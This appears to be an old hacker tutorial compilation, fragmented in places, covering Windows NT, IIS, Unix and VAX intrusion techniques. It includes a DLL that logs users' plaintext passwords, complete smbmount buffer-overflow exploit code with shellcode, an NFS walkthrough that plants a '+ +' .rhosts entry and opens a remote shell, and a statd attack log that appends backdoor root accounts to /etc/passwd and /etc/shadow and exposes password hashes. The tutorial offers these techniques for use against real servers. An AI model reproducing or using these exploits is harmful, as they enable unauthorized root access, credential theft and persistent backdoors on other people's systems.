Oracle, Sybase.... be my gue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this above daemon is written so that new change notification modules can be plugged in to it (like the PAM spec as an example) it would be flexible enough for all the above. Of course this will make any securiy expert shudder, as compromising the DES key comprmises all new password changes, but that's the price we pay for simplicity (Bruce Schneier(sp?) would definately not approve :-). Anyway enough with the pontificating, here's the code :-). (Code was written with Microsoft Visual C++ 4.x, not tested on other compilers). As always, this code has no warranty, and using it may cause your system to self destruct in 5 seconds .. .etc, etc, etc.... (hope that's enough legal-ease to protect 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me comments by: Mark Joseph Edwa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though some people think that this exploit only works on a PDC, this is NOT so. It works just fine on NT systems installed just as a server (non-domain controller), and it also works just fine on NT Workstation. This DOESN'T work on a Backup Domain Controller, but it DOES work on a Primary Domain Controller. Also, take note that NT 4.0 and Service Pack 2 (or greater) are required for this to work on any variety of NT installation. If you want more information on this hook, see Microsoft's Knowledge Base article # Q151082, located here. You may also want to take note right here and now that the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, could also be overwritten with a trojan .DLL. Once this happens, you're toast. Ou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re's Jeremy's useful (non-trojan) c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ut here-------pwdchange.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windows.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stdio.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stdlib.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ruct UNI_STR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HORT l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HORT maxl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CHAR *buf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atic HANDLE f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OOLEAN __stdcall InitializeChangeNotif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WORD wro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h = CreateFile("C:\\temp\\pwdchange.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ENERIC_WRI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LE_SHARE_READ|FILE_SHARE_WRI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REATE_ALWAY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LE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG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riteFile(fh, "InitializeChangeNotify started\n", 31, &amp;wrote,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turn TR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NG __stdcall PasswordChangeNotif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ruct UNI_STRING *u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LONG ri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ruct UNI_STRING *passw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WORD wro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CHAR wbuf[2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ar buf[51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ar buf1[2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WORD l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mcpy(wbuf, user-&gt;buff, user-&gt;l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en = user-&gt;len/sizeof(WCHA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buf[len] =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cstombs(buf1, wbuf, 1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printf(buf, "User = %s : ", buf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riteFile(fh, buf, strlen(buf), &amp;wrote,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mcpy(wbuf, passwd-&gt;buff, passwd-&gt;l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en = passwd-&gt;len/sizeof(WCHA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buf[len] =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cstombs(buf1, wbuf, 1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printf(buf, "Password = %s : ", buf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riteFile(fh, buf, strlen(buf), &amp;wrote,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printf(buf, "RID = %x\n", ri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riteFile(fh, buf, strlen(buf), &amp;wrote,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turn 0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d of pwdchange.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ut here-pwdchange.de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POR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itializeChangeNotify=_InitializeChangeNotify@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sswordChangeNotify=_PasswordChangeNotify@1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d pwdchange.de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6] Reverting an ISAPI Scrip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SAPI scripts run under the IUSR_MACHINENAME account under IIS, and thus, inherit the security permissions of this account. However, if the ISAPI program contains a simple call labelled RevertToSelf(), you have a big hole. Once that program line is executed, the ISAPI program reverts it's authority to the all-powerful SYSTEM account, at which point the program can do just about anything, including successfully execute system() cal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ry it yourself - this DLL runs on Intel based IIS machines. Drop it in your scripts directory, and call it without any parameters using your Web browser. (i.e. http://www.yoursite.com/scripts/revert.dll) It creates a directory called C:\IIS-REVERT-TEST with no trouble at all :( I tested this on an NTFS partition with no normal user permissions on the root direc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itionally, Laxmikant Gunda was kind enough to report to us that there is yet another way to perform this same exploit. Laxmikant offers the follow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SAPI DLL runs under the security context of the IUSR_MACHINENAME account under IIS, and thus inherit the security permissions of that account. However, if the ISAPI DLL can create a process using a call to CreateProcess( ). The process created inherits the security context of the powerful LocalSystem account rather than IUSR_MACHINENAME, thus creating a hole. Thus, any system process can be fired by the ISAPI DLL using this techniq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can be tried using a generic ISAPI DLL &amp; inserting code for CreateProcess( ) with a process name present in the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behaviour is documented in MSDN library on Impersonation : "When a thread is impersonating a user, most actions by the thread are done in the security context of the thread's impersonation token rather than the primary token of the process that owns the thread. For example, an individual thread of a server process can impersonate a client to verify that the client is allowed to access a securable object. However, some actions are always done using the security context of the process. For example, if an impersonating thread calls the CreateProcess function, the new process inherits the primary token of the process rather than the impersonation token of the calling thread. Similarly, the system always uses the primary token of the process to validate actions requiring the SE_TCB_NAME privile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7] Rollback.ex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Windows NT 4.0 Server and Workstation compact discs include a utility called Rollback.exe. Rollback.exe was designed to help computer manufacturers preinstall Windows NT 4.0, and allow end-users to do the final configuration according to the desired role of the computer. Running this utility will remove all registry settings on a system and bring it back to the end of the Character Based Setup portion of the Setup program, effectively undoing everything configured by the GUI portion of Windows NT Set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ARNING: Do not run this file on a production system! There is no way to recover information erased by running this utility, so anything stored in the registry will be lost. This includes user account information, protocol bindings, application settings, user preferences, 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RE INFORM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you run Rollback.exe on a production system there is no warning that Rollback.exe removes all system registry entries. Therfore, after you run Rollback.exe there is no system to rescue or to restore as the registry and the Setup.log file no longer exi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only fix to this problem is to restore the entire system from a current tape back up. Emergency Repair Disk does not restore the system as it requires the Setup.log and specific registry components to be pres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llback.exe is on the Windows NT compact discs in the following direc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upport\deptools\&lt;system&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8] Replacing System .dl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tem DLLs are called by applications and the registry, and can be replaced with trojaned/virused versions. %systemroot% and %systemroot%\system32 directories have default permissions of 'Everyone' (includes guest) set to 'Change'. This allows DLLs not in use to be replaced. DLLs in use are lock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LLs are run by programs at various levels during normal operation. A DLL for example can be run with SYSTEM privileges by a service while a user with normal privileges is logged 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s also true for the MSGINA.DLL, which is the default "Graphical Identification and Authorization" provider for the local console logon, which if replaced, could seriously compromise your entire enterpri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2.9] Renaming Executab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ecutables renamed as .xxx files run as executable from command line. Executables can be renamed with any extension and run from the command prompt or batch file. Subverts filtering/download control by filename extens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so executables without a filename extension can be started from the command prompt or batch file, as NT will try to run the file as .COM, .EXE, .CMD, or .BAT in that ord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leaves room for a potential trojan to be introduced into the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0] Viewing ASP Scrip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SCRI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erious security hole was found in Microsoft's Active Server Pages (ASP) by Juan T. Llibre &lt;j.llibre@codetel.net.do&gt;. This hole allows Web clients to download unprocessed ASP files potentially exposing user ids and passwords. ASP files are the common file type used by Microsoft's IIS and Active Server to perform server-side processing. Microsoft confirms that .HTX and .IDC files are also vulner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OW IT WOR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download an unprocessed ASP file, simply append a period to the asp URL. For example: http://www.domain1.com/default.asp becomes http://www.domain1.com/default.asp. With the period appendage, Internet Information Server (IIS) will send the unprocessed ASP file to the Web client, wherein the source to the file can be examined at will. If the source includes any security parameter designed to allow access to other system processes, such as an SQL database, they will be reveal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1] .BAT and .CMD Attac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nding a command line to the server, such as "http://www.domain.com/scripts/expoit.bat?&amp;commandA+?&amp;commandB" to the server, and then clicking the Stop Button on the browser will cause the server to execute DOS commands on the server's O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ing a '+?&amp;time' or '+?&amp;date' to the end of the command, will cause the server to pause for input. Clicking the Stop Button on the browser will interrupt the server making a log entry of the command string execu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2] IIS /..\.. Probl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URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute a target scrip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y default user 'Guest' or 'IUSR_MACHINENAME' has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering gue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3] Truncated Fi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URL such as http://www.domain.com/scripts/exploit.bat&gt;PATH\target.bat will create a file called "target.bat". If the file "target.bat" already exists, the file will be truncated, erasing any previous cont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4] SNA Ho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om ntsecurity.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en you attach to shared folders on an AS/400 using SNA Server, where the security level is set to 30 or higher, and security has been set on the folders to allow limited access, after the first user connects to a shared folder, all subsequent users acquire the first user's access permissions to shared fold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problem occurs when SNA Server is sharing a single Local APPC LU when communicating to an AS/400. The security for shared folders on the AS/400 (when security is set to level 30 or higher), is tied to the controller. In this case, the AS/400 views the controller as its Remote LU, or SNA Server's Local APPC L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transaction program which supports the shared folders function on the AS/400 identifies a user based on the SNA Server Local APPC LU name being used. Therefore, if multiple SNA Server users are sharing the same Local APPC LU for use with shared folders, you are able to view each other's AS/400 folders. Due to the design of the AS/400 shared folders feature, the first shared folder's user to connect over a Local APPC LU determines the AS/400 security rights for the remaining users who connect over the same Local APPC L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Microsoft' information on this, see their Knowledge Base article: http://www.microsoft.com/kb/articles/q138/0/01.ht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EN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reate a separate LU (Local to the SNA Server) for each user and pair each LU with the AS/400's LU. Then each user accesses a separate controller and has appropriate access to shared folders. In addition, each shared folder's client application must be configured with a unique Local APPC LU alias. If you prefer to leave this field empty, the SNA Server administrator can assign a default Local APPC LU alias for each user using SNA Admin (2.x) or SNA Server Manager (3.x) configured on the user rec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5] SYN Flood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 your computer running the TCP/IP protocol and connected to the Internet, some or all network services are rendered unavailable and error messages such as the following appear on the network client scre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nnection has been reset by the remote ho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symptom of all network services being rendered unavailable may also occur on a computer running an operating system other than Windows NT, for example, Uni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r computer has become the target of a malicious attack known as TCP/IP "SYN Flooding" or "SYN Attac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puter hackers" can target an entire machine, or a specific TCP service such as web services. The attack is focused on the TCP protocol used by all computers on the Internet, and is not specific to the Windows NT operating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ow SYN Flooding Wor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N Flooding works as follows: (see also CERT(sm) Advisory CA-96.21 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tp://info.cert.org/pub/cert_adviso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 TCP connection request (SYN) is sent to the target computer. The source IP address in the packet is "spoofed," or replaced with an address that is not in use on the Internet, or that belongs to another computer. An attacker will send many of these TCP SYNs to tie up as many resources as possible on the target compu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Upon receiving the connection request, the target computer allocates resources to handle and track the new connection, then responds with a "SYN-ACK". In this case, the response is sent to the "spoofed" non- existent IP add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No response is received to the SYN-ACK. A default-configured Windows NT 3.5x or 4.0 computer will retransmit the SYN-ACK 5 times, doubling the time-out value after each retransmission. The initial time-out value is three seconds, so retries are attempted at 3, 6, 12, 24, and 48 seconds. After the last retransmission, 96 seconds are allowed to pass before the computer gives up on receiving a response, and deallocates the resources that were set aside earlier for the connection. The total elapsed time that resources are in use is 189 seco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you suspect that your computer is the target of a SYN attack, you can type the following command at a command prompt to view connections in the "SYN_RECEIVED" st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stat -n -p tc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a large number of connections are in the SYN_RECEIVED state, it is possible that the system is under attack. A network analyzer can be used to track the problem down further, and it may be necessary to contact your Internet Service Provider for assistance in attempting to trace the sour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effect of tying up connection resources varies, depending upon the TCP/IP stack and applications listening on the TCP port. For most stacks, there is a limit on the number of connections that can be in the half-open (SYN_RECEIVED) state. Once the limit is reached for a given TCP port, the target computer responds with a reset to all further connection requests until resources are fre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6] Land Att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and Attack sends SYN packets with the same source and destination IP addresses and the same source and destination ports to a host computer. This makes it appear as if the host computer sent the packet to itself. Windows NT operates more slowly while the host computer tries to respond to itsel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7] Teardro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wo specially fragmented IP datagrams are sent to the victim. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset &lt; N and with a payload of &lt; N. The fragmented datagrams will try to realign themselves, however, the payload of the current fragment does NOT contain enough data to cover the realigning. This will cause a reboot or a halt, depending on how much physical memory you've go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3.3.8] Pentium Bu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en an Intel processor receives a specific invalid instruction, your computer may stop responding (hang). Your computer must be turned off and restarted to return to normal oper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you execute F0 0F C7 C8 on a P5 it will lock the machine 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0.0] VAX/VMS Makes a comeback (expired user explo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is an explenation of a vax exploit that discover.  The explo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unctions in that when a username has expired it doesnt delete the user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just puts a new password on the username named temporary password.  Unt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user can input a new password to reactivate his account.  I will expl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exploit step by step but this text is intended for a more advanced reader. Remember VAX/VMS is a very secure area to work in you can g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aught if you dont know what you are doing.  Well in this text i will gi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a server that has this exploit so you can verify it yoursel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other thing is that you need to know about how to use the telnet progr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you dont know get a guide and start learning before using th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ep by Step explanation: (if you dont own an account on the VMS/VA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0.1] Step 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Finger the users of the server if you have a finger utility, but you need one that gives you the last date log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0.2] Step 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Get the usernames that have an old date like a year ago, basically, something that looks expi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4.0.3] Step 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Now goto to the login screen of the server type in the user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en it promts you for a password you will type the word temp.  Now for th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moment you will be entering the vax system and it will prompt you to type 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w pssword because the password has expired.  As you can see you now ow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user priviledge accou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4.0.4] No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easiest way to find systems that are exploitable is to check universities. As we know most universities issue students usernames that are the first letter of their first name and then their whole last name. Example: If your name is John Doe your username would be jdoe. So the best thing you can do is finger universities and try to find as pointed out earlier user names that have the last login date of a year or so ag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ps to Hellmaster for the techniq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5.0.0] Linux security 10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So you just got the latest linux distro installed? What now? How about a bit of security.  You need to immediately secure your system after installation if you want your 0-day sploits to be safe (especially if you hang out on irc).  Here I will try and show ways to prevent remote and local attacks.  These techniques should work on redhat and debian, but it is primarily made for slackware, the best distro out the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5.0.1] Step 1: pico /etc/inetd.conf .  This file tells inetd what daemons to open up each time it is run.  I generally only keep ftpd available to localhost and telnetd open to all.  Close up any services that you feel are not imperative to keep you running by sticking a # in front of the service na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5.0.2] Step 2: Permissions.  Make sure that your root directory is only readable to root to prevent users from snooping.  Type: chmod 700 /root .  Also, make sure that only the correct owner can snoop through home directories. cd /home ; chmod 700 * .  That should do it.  Next, chmod 700 /mnt ; chmod 700 /floppy ; chmod 700 /cdrom .  Then you should have all the permissions setup correctl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ide note: You may want to only use X-windows as root (thats what I do), as X-win binarys are a good way to exploit a system.  So maybe do a chmod 700 /usr/X11/bin ; chmod 700 /usr/X11R6/bin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5.0.3] Step 3: RPC services.  Try typing rpcinfo -p localhost and see what you get.  Remember the results and go into /etc/rc.d .  Look through those files for the various rpc servers.  Comment the rpc services as needed in those files.  Almost every remote procedure call is exploitable.  Its better just not to run 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5.0.4] Step 4: Install ttysnoop. ttysnoop allows you to see what users are doing when they login to your box.  Heres how to instal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 pico /etc/inetd.conf and stick a comment (#) in front of the line that rea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elnet stream  tcp     nowait  root /usr/sbin/tcpd  in.telnet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n look 3 lines below. You will s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lnet stream  tcp     nowait  root    /usr/sbin/tcpd /usr/sbin/in.telnetsnoop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comment that line, and save the file.  Then restart inetd by type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s -aux |grep inet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et the pi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ill -9 (pi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et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n it should be restarted and you can try it out by telneting to localhost and logging in , and then in another window type w to find out what tty you just logged into and then type: ttysnoop ttyp# .  You should now be able to see everything that the user types in.  Very effecti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5.0.5] Step 5: Watching them.  You should always be aware of who is on your system at any given time.  A good way to do this is to, if you are in X-windows, type xconsole -font 5x8 -file /var/log/messages -geometry 550x80 . This will open a small xconsole window that will tel you who is connecting to you.  Keep this in a bottom corner.  The next step is to get tcpdump.  Find it at sunsite.  type tcpdump in a smaill xterm and keep that in another corner.  What that will do is show you every single little connection to you.  Such as connections from every por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15.0.6] Step 6: Misc security program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SH : Secure shell- This program is a replacement to telnet, s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at your passwords cannot be sniffed.  It uses encryp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o connect to every server that you telnet to.  More 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more servers are using this everday because of the grow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reat of hackers.  Of course, the remote server that yo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re telneting to has to run SSH as well for it to wor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ightbar : Login Security- This program is basically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replacement to /bin/login.  It is EXTREME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customizable and provides that extra edge of secu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to your login sequenc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COPS : Computer Oracle and Password System- This nice litt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rogram automatically scans your system f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misconfigurations and warns you of the weaknesses.  Its a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n excellent way to systematically check for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permission mistak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y following the above steps, you have stopped about 99.8% of all hackers breaking into your system (Just hope you dont meet up with some russian hacker =) You will be invincible on IRC.  Considering in all my time with Linux, Ive never been hacked.  Peace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hreak-0 (Phreak_0@hotmail.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anks to Phreak-0 for that por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0] Unix Techniques. New and Ol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1] ShowMount Techniq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is an old school technique that most hackers don't know. The two commands you need to learn are showmount and mou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y are used in the following wa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mount server.com:/remotefolder /localfold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fter you issue the command then do cd /localfolder and you will be on the remote computers shared folder.  The remotefolder is the folder of the remote system that you want to mount. The localfolder is where you want the remote folder to appear to be on your system. So if you do mount server:/remote /mnt then when you are on your local system you can do cd /mnt and browse around inside that folder. The contents of that folder will be the contents of the remote folder that you shar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2] DEFINI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howmount lists all the clients that have remotely mounted a filesystem from host.  This information is maintained by the mountd server on host, and is saved  across  crashes  in the  file  /etc/rmtab.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    Print the list of shared file syste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unt attaches a file system to the file system hierarchy at the  mount_point,  which is the pathname of a directory.  If mount_point has any contents prior to the  mount  operation, these are hidden until the file system is unmoun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mount unmounts a currently mounted file system,  which  may be specified either as a mount_point or as special, the device on which the file system resid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hosts The files specify remote hosts and users that are considered trusted.  Trusted users are allowed to access the local system without supplying a password. The remote authentication  procedure  determines  whether  a user  from  a  remote  host  should be allowed to access the local system with the identity of a local user.   This  procedure  first  checks  the  /etc/hosts.equiv  file  and then checks the .rhosts file in the home directory of  the  local user  who  is requesting access.  Entries in these files can be of two forms.  Positive entries allow access, while negative  entries deny access.  The authentication succeeds wh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matching positive entry is  fou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ostname [user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pecial character `+' can be used  in  place  of  either hostname  or  username to match any host or user.  For example, the ent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ives any user at any host access to the shell without supplying a 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pcinfo makes an RPC call to an RPC server and reports  what it finds.  In the first synopsis, rpcinfo lists all the registered  RPC services  with  rpcbind  on ho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pcinfo -p [ho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 showmount on ninja.com would look like thi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home/chameleon/ $/usr/sbin/showmount -e www.ninja.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port list for www.ninja.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ome      Every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r    elite.ninja.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r    samuri.ninja.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home/chamele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irst section is the folder name. The section part is who has access. If it says Everyone then anyone at all can access that folder. If it has an address like elite.ninja.com only people from elite.ninja.com can access that folder. If there is a users folder shared or a home folder etc... that is shared to everyone then you can gain a user account to the system. You would do the following. Say we use ninja.com as an example. We earlier saw that we have access to /home we would then mount /home and goto a users directory and create us an rlogin for the system. The attack would be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home/chameleon$ /usr/sbin/showmount -e www.ninja.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port list for www.ninja.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ome      Every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r    elite.ninja.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r    samuri.ninja.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w, you must su to root to have access to mount things to various folders on the syste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home/chameleon/ $s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home/chamele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home/chameleon# mount www.ninja.com:/home /m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 cd /m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mnt/ # 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waller  paget     pamcourt  papabear  parsetru  pathenry  patsyk    paulavi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1230    paintere  pamdon    papas     partsman  patio     patti778  paul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c       paintroc  pamelaj   pappabea  pataiki   patj      pattic    paul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ckers   paiyn     pamelat   papryor   pataul    patjohn   pattie    paulj</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ddock   pal       pamh      paris1    patbrady  patmon    pattil    paull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dgettr  paladin   pamomary  parkerh   patc      patmraz   pattygae  paulpj</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at you are looking at here is the contents of www.ninja.com's home di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 lets add one of their users to our passfile, so we can become th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 pico /etc/passw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 the li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mcourt::200:10023:Pam Court:/home/chameleon/mnt/pamcourt/:/bin/ba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e put this as the home dir, because this is                                      where the mounted home directory is loca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 login locally as pamcou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mnt/home/pamcourt/$ whoam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mcou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mnt/home/pamcourt/$ echo "+ +" &gt; ~/.rho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will make the rhosts entry as ++, which means anyone can remotely issue commands from it. Now, we remotely login to ninja.com as pamcou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mnt/home/pamcourt/$rsh -l pamcourt www.ninja.com csh -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lcome to ninja.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 are lame and left open a filesharing backdo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therefore have a shell on ninja.com. The rsh and rlogin syntax i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sh [ -l login ] [ -n ] host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login [ -E | -ex ] [ -l username ] [ -8 ] [ -L ] ho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at is how to gain a user account onto a remote system. Also if you can spoof your dns or maybe the server has a router on it etc... that you can bounce through you could therefore access any files that are shared to that restricted host. Ex: in our above example if we spoofed as elite.ninja.com we would then have access to /usr. Although this technique is old it still works on many servers. So learn it and use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check if a server has filesharing do: rpcinfo -p server.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rra:/home/m/mgi/.noid $rpcinfo -p oberon.calstatela.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rogram vers proto   port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00000    4   tcp    111  rpcbi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00000    3   tcp    111  rpcbi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00000    2   udp    111  rpcbi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00004    2   udp    713  ypserv</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00004    2   tcp    714  ypserv</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00003    2   udp   2049  nf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it has a like the above one that says nfs, then it has fileshar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3] COMPARISION TO THE MICROSOFT WINDOWS FILESHAR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BTSTAT -a www.ninja.com would show the NetBIOS Statistics which includes shared folders (directori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nbtstat -A 204.73.131.1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NetBIOS Remote Machine Name T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Name               Type         Stat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1       &lt;20&gt;  UNIQUE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1       &lt;00&gt;  UNIQUE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AIN1        &lt;00&gt;  GROUP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AIN1        &lt;1C&gt;  GROUP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AIN1        &lt;1B&gt;  UNIQUE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ENT1       &lt;03&gt;  UNIQUE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AIN1        &lt;1E&gt;  GROUP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OMAIN1        &lt;1D&gt;  UNIQUE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__MSBROWSE__.&lt;01&gt;  GROUP       Regis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C Address = 00-C0-4F-C4-8C-9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net view 204.73.131.1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ared resources at 204.73.131.1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are name   Type         Used as  Com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TLOGON     Disk                  Logon server sh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st         Dis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mmand completed successful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net use x: \\204.73.131.11\t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mmand completed successful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16.0.4] SMBXPL.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default parameters to the progr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ften work, however I have found that the offset parameter someti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aries wildly, values between -600 and -100 usually work though, a qui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hell script will scan through the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mbexpl -- a smbmount root exploit under Linu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uthor: Gerald Britton &lt;gbritton@nih.gov&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his code exploits a buffer overflow in smbmount from smbfs-2.0.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he code does not do range checking when copying a username fr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he environment variables USER or LOGNAME.  To get this far in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he code we need to execute with dummy arguments of a server and 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mountpoint to use (./a in this case).  The user will need to cre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he ./a directory and then execute smbexpl to gain root.  This c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is also setup to use /tmp/sh as the shell as bash-2.01 appears t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do a seteuid(getuid()) so /bin/sh on my system won't work.  Final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 "-Q" (an invalid commandline argument) causes smbmount to fail wh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parsing args and terminate, thus jumping into our shellc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he shellcode used in this program also needed to be specialized a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smbmount toupper()'s the contents of the USER variable.  Self modify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ode was needed to ensure that the shellcode will survive toupp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he quick fix for the security probl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hmod -s /sbin/smbmou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A better fix would be to patch smbmount to do bounds checking wh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opying the contents of the USER and LOGNAME variab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stdlib.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clude &lt;stdio.h&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ine DEFAULT_OFFSET                 -20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ine DEFAULT_BUFFER_SIZE             21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ine DEFAULT_ALIGNMENT                 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fine NOP                            0x9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This shell code is designed to survive being filtered by toupp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ar shellco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xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x4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x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x2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xeb\x05\xe8\xdb\xff\xff\xf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xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0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x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xc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x80\xe8\xdc\xff\xff\xff/tmp/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signed long get_sp(voi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__asm__("movl %esp,%ea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oid main(int argc, char *argv[])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char *buff, *pt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ong *addr_ptr, add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nt offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZ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nt alignment=DEFAULT_ALIGN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nt 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f (argc &gt; 1) bsize  = atoi(argv[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f (argc &gt; 2) offset = atoi(argv[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f (argc &gt; 3) alignment = atoi(argv[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rintf("bsize=%d offset=%d alignment=%d\n",bsize,offset,align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if (!(buff = malloc(bsiz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rintf("Can't allocate memory.\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exit(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ddr = get_sp() - offs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fprintf(stderr,"Using address: 0x%x\n", add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tr = buf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ddr_ptr = (long *) (ptr+align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for (i = 0; i &lt; bsize-alignment; i+=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ddr_ptr++) = add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for (i = 0; i &lt; bsize/2; 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buff[i] = NO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tr = buff + (128 - strlen(shellco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for (i = 0; i &lt; strlen(shellcode); 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ptr++) = shellcode[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buff[bsize - 1] = '\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setenv("USER",buff,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execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",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5] Basic Unix Comman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wd  - Shows the current directory that you are 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d - change directory. Ex: cd hack would put you into the directory h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d .. would drop you back 1 directory. So if you are in /home/chameleon and you type cd .. you would then be in /ho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s - List files. ls -a to show ALL files. ls -l to list files in long format with byte size etc.. ls -la to do bo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mod - This command changes permissions of a file or directory. The syntax is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mod who+,-,=r,w,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o can be u (user) g (group) o (other) a (al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 means to add the permission and - means to remove the permiss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at - This prints out stuff to the screen. Such as files. Ex: cat /etc/passwd this would print the password file to the screen. You could also do cat /etc/passwd &gt; password.txt this would redirect the out put of passwd into the file password.txt, that is what the &gt; is used f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sswd - Changes password to a users accou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s - Shows what processes you have running. ps -e will show everything that you have runn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rep - Searches for words that you specify. This can be used to search a file for a certain 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x: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grep rhino9 elite.tx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hino9 is eli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 could also use this to find a username with out a password in the passwd file. We would do cat /etc/passwd | grep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v - Moves (rename) files and directorys. Syntax: mv filename newfilename You can also pass folder arguments such as mv /etc/passwd /etc/passwd.txt Example mv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hino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mv rhino9 rhino9.tx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hino9.tx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p - Copy. Syntax: cp filename copiedfilename You can also pass folder argumen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 cp /e/beer cp /e/beer.tx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n - Manual pages. Syntax man commandyouneedhelpon. Ex: man grep would give you help on the grep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lp - Get help on certain commands. Ex: finger -hel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kdir - Creates a directory. Syntax: mkdir newdir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mdir - Removes a directory. Syntax: rmdir dir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m - Removes files and folder. Syntax: rm filename rm -R foldername (most syste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rite - Write to another users terminal. Syntax write user ttyname then hit enter then type stuff then ctrl+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sg - Turns on or off write access to your terminal. Syntax: mesg y (on) mesg n (of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u - While you are already logged into a system. You can log in with another account. su user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 - Shows who is onl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o - shows who is onl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6] Special Chracters in Unix:</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 matches any number of single characters eg. $ ls john* will list all files that begin with joh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 matchs any one of the chracter in the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 matches any single chrac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mp; - runs a process in the backgroung leaving your terminal fr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 values used for variables also $n - null argu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t;- redirectes output ls -la &gt; /tmp/li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t; - redirects input to come from a fi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t;&gt; - redirects command to be added (appended) to the end of a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 pipe output (eg: cat /etc/passwd | mail tk85@hotmail.com will mail tk85@hotmail.com the /etc/passwd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7] File Permissions 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wxrwxrwx   1 user      group         5 Dec 22 12:52 file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irst section is the file permissions, read &amp; write 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the first character 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 is an ordinary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   - is a directo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   - is a block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   - is a character fi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next 3 characters after the first char, are the owners rights to the file. They can be r or w or x or all 3 or whatever. The second 3 characters are the group rights to the file and they can be r or w or x or all 3 or whatever. The last 3 characters are everyone elses rights to the file and they can be r or w or x.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 - rea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 - wri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x - execu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next section after -rwxrwxrwx is how many files are within that folder. If it is not a folder then it will be 1 and if it is a folder then it will be how many files are in it. The next section after that is the username section. It is the username of the owner of the file. So therefore whoever's name is there has the owner rights as described earlier. Then after that is the groupname. It is the name of the group that the file is in. Whatever the groupname is the group rights apply to it. Then comes the file size then the file date and lastly the file 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asswd Entry Break Dow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ameleon:k54doPeHte:0:0:root of all evil:/home/chameleon:/bin/ba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  ^ ^  ^^^^^^^^^^^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                 B          CD           E                          F                    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name | Encrypted pass | user id | group id | comments | home directory | shell the user u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A                 B                     C             D             E                       F                       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8] STATD EXPLOIT TECHNIQ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tatd Is one of the best c file exploits in a long time. Statd single handedly exploits SunOS X.X &amp; Sys V systems. It works by exploiting a buffer overflow through rpc and drops you into root on a remote system. There are statd scanners and other neat tools that can be found a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ww.d-lab.com.ar/sekret/warez (home of the famous Code Zero). Once you have the statd exploit program (runs on some sunos &amp; sys v servers) you will want to either use a scanner to scan a large list of servers for statd exploitable ones. One good way of finding statd exploitable server is going to yahoo and then searching for "sys v" then try the different servers that yahoo finds. You can use a program called "hosts" by Devix that will dump server names from html files. So if you goto yahoo and then search for sys v you could dump all the serves into a text file with the hosts program and then use a statd scanner to have it check for statd exploitable servers. Devix's hosts program can be found on the rhino9 site. Ok so say you have found a statd able server. You type at your prompt statd server.com Here is a log of an actual hack using statd. Note: Comments have *'s around th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home/chameleon/ $statd www.victim.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server is statd exploitable but the server admin has been notified so don't try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pc.statd is located on tcp port 4441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nt exploit code, now waiting for she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rst thing to do is type, w, to see who is on and if any sysadmins are acti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5:27am  up 3 day(s),  6:35,  4 users,  load average: 0.05, 0.06, 0.0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er     tty           login@  idle   JCPU   PCPU  w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abe     pts/3        Sat 1am  2:38   1:37         -tc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burgyan pts/4        Fri11pm    55     20      2  p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abe     pts/5        Sat 7am  3:08     29         -tc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burgyan pts/8        Mon 4am 23:22     16         -tc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statd is not telnet so you wont show up when someone does w etc.. so you are a gho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at /etc/passw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ot:x:0:1:System Administrators:/:/sbin/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emon:x:1:1:0000-Admin(0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in:x:2:2:0000-Admin(0000):/usr/b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x:3:3:0000-Admin(00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m:x:4:4:0000-Admin(0000):/var/ad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ane:x:539:107:Kane Products FTP account:/usr/www/docs/kane/:/bin/tr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cco:x:540:107:ECCO:/usr/www/clients/ecco/:/bin/tr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odatsys:x:541:107:I/O Data Systems:/usr/www/clients/iodatasys/:/bin/tr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alschu:x:542:107:Neal Schuman FTP Account:/usr/www/clients/nealschuman/:/bin/tr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james:x:543:107:Joanne James:/home/jjames:/bin/tc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lock:x:543:107:nlock:/home/milo:/bin/tc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xlock:x:0:1:xlock:/:/sbin/s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echo b0bby:x:542:107:Rhino9 owns bitch:/usr/rhino9/:/bin/tcsh &gt;&gt; /etc/passw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echo b0b:x:0:1:Rhino Root:/:/sbin/sh &gt;&gt; /etc/passw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at this does is copys a low level user b0bby and a root user b0b. Remember that 2 &gt;&gt;'s make the stuff appened to the passwd file. If it was one &gt; then the whole thing would be over written and that is not goo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at /etc/shad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ot:jLKY54WA3Teeo:102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emon:NP:644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in:NP:644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s:NP:644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m:NP:644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ane:*L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cco:J/f78z945yJiQ:101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odatsys:k/F455ygv0lKo:101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ealschu:Z1te54ytjJxtyY:101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james:q1dMg453A0LYLE:1019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lock:hEcxTL/4353p3FU:1021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xlock::102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echo b0bby::10199:::::: &gt;&gt; /etc/shad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echo b0b::10200:::::: &gt;&gt; /etc/shad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must do the passwd and shadow echos as we have show here if the system uses shadowed passwords. What we have just done is add the logins to the shadow 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 press control + ][ Then hit en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ropStatd&gt; qu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ype quit at the prompt. You are now back on your system. Now telnet back to www.victim.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home/chameleon/ $ telnet www.victim.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rying 205.133.121.21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nnected to deals.4deals.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scape character i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IX(r) System V Release 4.0 (hq)</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gin: b0bb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n it will ask you to set a pass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ictimCorp$ su b0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at we did the was su into b0b, our root account. Now set a pass for b0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passwd b0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ter your pa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you go that basically all it takes to get root onto a system that is statd exploita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ank you to so1o for that mad phat explo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0.9] System Prob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llowing are ways in which to gather information from a target ho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the rest of this topic we will refrer to the target site which will be ninja.c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se are in no order and are mostly unix commands used to gather information about a syst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1.0] Port scann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can find many port scanners on the internet. Search yahoo for portscan et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at is a port scann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at a port scanner does is it checks a remote host for open ports, ports listening for a connection request or remote services etc... The importance of port scanning a system is to find out the services it has open. If we know what services a server has open we can then research and try to find flaws for those services. Also we can do certain DoS attacks if we know what ports are open. There are many port scanners. Some of the more advanced ones are for unix and can not leave a trace on the remote server that you port scan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1.1] rusers and finger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mmands syntax are as follow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users [-a] [-h] [-i] [-l] [-u] [ho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ing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 --version           display version numb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l, -m, --info      display full user inform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 -s, --brief         opposite of --info; only display login reco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 --faces             display mugshot for us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 --port #p           connect to finger daemon using port or service #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 --help              display this mess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 you will find however that most servers have turned off finger services. Almost no WindowsNT servers have finger services and most unix have 